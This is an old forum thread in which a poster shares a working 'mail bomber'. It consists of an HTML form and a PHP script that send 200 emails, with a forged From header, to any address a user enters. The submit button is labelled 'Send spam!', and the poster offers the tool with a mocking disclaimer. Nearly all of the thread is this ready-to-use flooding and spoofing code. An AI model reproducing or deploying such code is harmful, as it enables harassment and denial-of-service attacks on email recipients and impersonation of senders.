They're called Mail Bombers and I don't recommend using them![]()
That's why we seize the moment, try to freeze it and own it, squeeze it and hold it cause we consider these minutes golden.
Hope you use it and get fined.
index.php
mail.phpHTML Code:<form action="mail.php" method="post"> <font face="Trebuchet MS" size="2">This mailer sends 200 emails to the address you specify!<br /><br /> Too (Send your mail too): <input type="text" name="mailer" /><br /> From (Who you are, or anonymus?): <input type="text" name="from" /><br /> Body (Content of the email): <input type="text" name="body" /><br /> Subject ("Email Title"): <input type="text" name="subject" /><br /> <input type="submit" name="submit" value="Send spam!" /> </font> </form>
I made something out of Craig's script. EnjoyPHP Code:<?php
$youremail = "youremail";
if($_POST["mailer"] == $youremail) {
echo( 'Nice try maan.' );
exit();
}
if($_POST["from"] == $youremail) {
echo( 'Nice try maan.' );
exit();
}
$to = $_POST["mailer"];
$from = $_POST["from"];
$body = $_POST["body"];
$num = 200;
$subject = $_POST["subject"];
for($i=0;$i<=$num;$i++)
{
mail($to,$subject,$body,"From: <$from>");
}
echo( 'Sending complete.' );
?>![]()
Last edited by Calon; 01-10-2008 at 07:52 PM.
Want to hide these adverts? Register an account for free!